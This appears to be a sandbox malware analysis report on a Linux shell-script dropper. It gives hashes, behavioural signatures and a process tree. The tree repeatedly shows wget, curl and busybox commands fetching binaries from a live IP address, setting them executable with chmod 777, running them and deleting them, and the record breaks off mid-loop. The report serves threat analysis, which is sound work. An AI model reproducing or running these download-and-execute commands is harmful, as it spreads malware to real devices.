Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
14-11-2024 02:38
Static task
static1
Behavioral task
behavioral1
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
-
Size
10KB
-
MD5
b511b6f4aeffa16d10d0f7ef26b0e23b
-
SHA1
83f64c0a7d2007fd0182aaae9636c5bbba453efe
-
SHA256
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
-
SHA512
a1c7929b890f434323d545f2ff0617c27810df5928f3e0293cf4ac5bb7f3014d60af9634e6d734311204d66700d5b1b0c248f868d6a55b9e14c1c694c458e1c4
-
SSDEEP
96:mb9FNeCpCayHzBeLXN04ASV4A/vfyOaMw9FNeCzxCayHzy+desXXoBA04ASBnvKx:m9L14A/vfyOa+/vfyOy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 766 chmod 893 chmod 917 chmod 815 chmod 929 chmod 746 chmod 833 chmod 911 chmod 959 chmod 796 chmod 881 chmod 899 chmod 983 chmod 752 chmod 857 chmod 863 chmod 869 chmod 953 chmod 965 chmod 887 chmod 935 chmod 977 chmod 941 chmod 947 chmod 971 chmod 875 chmod 905 chmod 923 chmod -
Executes dropped EXE 28 IoCs
Processes:
YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4IVYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZSfnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFdH8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoiRPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sEwTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQH9V9m6knvYYGckfXaKe6Jh0GbKifmOcHakcPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FIROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6LFcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOGZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFtVYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZSfnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFdH8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakSYsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4IRPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sEwTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoiH9V9m6knvYYGckfXaKe6Jh0GbKifmOcHakcPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FIROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6LFcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOGZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFtioc pid Process /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I 747 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS 753 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd 767 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS 797 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi 816 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed 834 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE 858 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ 864 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak 870 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ 876 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 882 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L 888 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG 894 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt 900 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS 906 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd 912 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS 918 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I 924 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed 930 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE 936 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ 942 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi 948 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak 954 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ 960 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 966 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L 972 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG 978 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt 984 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxwgetKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FwgetcurlKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5Frmcurlbusyboxrmpid Process 880 busybox 962 wget 966 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 878 wget 879 curl 882 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 883 rm 963 curl 964 busybox 967 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd curl File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS curl File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed curl File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F curl File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt curl File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS curl File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG curl File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak curl File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F curl File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt curl File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE curl File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE curl File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS curl File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS curl File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L curl File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd curl File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG curl File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I curl File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ curl File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I curl File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed curl File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ curl File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi curl File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak curl File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi curl File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ curl File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L curl File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ curl
Processes
-
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:718
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:721
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:745
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:748
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:751
-
-
/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:754
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:755
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:760
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:770
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:772
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:790
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:800
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:802
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:814
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:817
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:822
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:837
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:838
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:854
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:859
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:860
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:862
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:868
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:874
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:882
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:886
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:892
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:898
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:904
-
-
/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:910
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:916
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
